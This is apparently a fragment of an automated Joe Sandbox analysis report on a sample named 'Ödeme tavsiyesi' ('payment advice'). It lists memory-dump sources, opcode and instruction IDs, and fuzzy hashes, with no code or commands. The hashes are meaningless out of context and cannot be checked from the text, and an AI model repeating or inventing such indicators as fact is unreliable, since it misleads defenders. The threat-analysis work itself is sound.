        • Opcode Fuzzy Hash: d5af5e00425b74e6e323a49f30b9754a67e5de3431b63a8b0438c7a3d54ec7a4
        • Instruction Fuzzy Hash: 34E0927164D3D0CFDB42677468944657F7A6E8670072606DBD042C7163D6948C4ED792
        Memory Dump Source
        • Source File: 00000000.00000002.3712688964.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_680000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6c1ebe82f249f70ac3228a8be56b6fd7cacb67854349cc9a3ef81f3a047c62f1
        • Instruction ID: 2018754deb0a2c47f61a0e5f5a96aa0979c650f83f77f550f54142be16512cd4
        • Opcode Fuzzy Hash: 6c1ebe82f249f70ac3228a8be56b6fd7cacb67854349cc9a3ef81f3a047c62f1
        • Instruction Fuzzy Hash: 19E07D141002646AE1443339440507E71F2EB85300FD18525DC429B355FF104C0753F5
        Memory Dump Source
        • Source File: 00000000.00000002.3712688964.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_680000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d9fadf437f98759a6f2e4a1db27ad54ce0071af74f4debcc0fb9f3e34aa3cf1e
        • Instruction ID: 8508ab821fe60bc3f72f515f5505d814620f3f44dedbf88ec3d5d8956dc9b24b
        • Opcode Fuzzy Hash: d9fadf437f98759a6f2e4a1db27ad54ce0071af74f4debcc0fb9f3e34aa3cf1e
        • Instruction Fuzzy Hash: AAD01235209110DFBA807658D40457A769B9F4D3613613A51E11BC7626D9605C069B91
        Memory Dump Source
        • Source File: 00000000.00000002.3712688964.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_680000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 0cc102909a69472b78025d631247821fd6df11356174d0751303b69f4b870d8e
        • Instruction ID: a3ea867d28a577543777e8d013f22346975e126b9a826ccc6b5c04d4c410f7d4
        • Opcode Fuzzy Hash: 0cc102909a69472b78025d631247821fd6df11356174d0751303b69f4b870d8e
        • Instruction Fuzzy Hash: B7B012016418318B1484B338201102C04D35B643103510A1CD447D3386EF050D07137E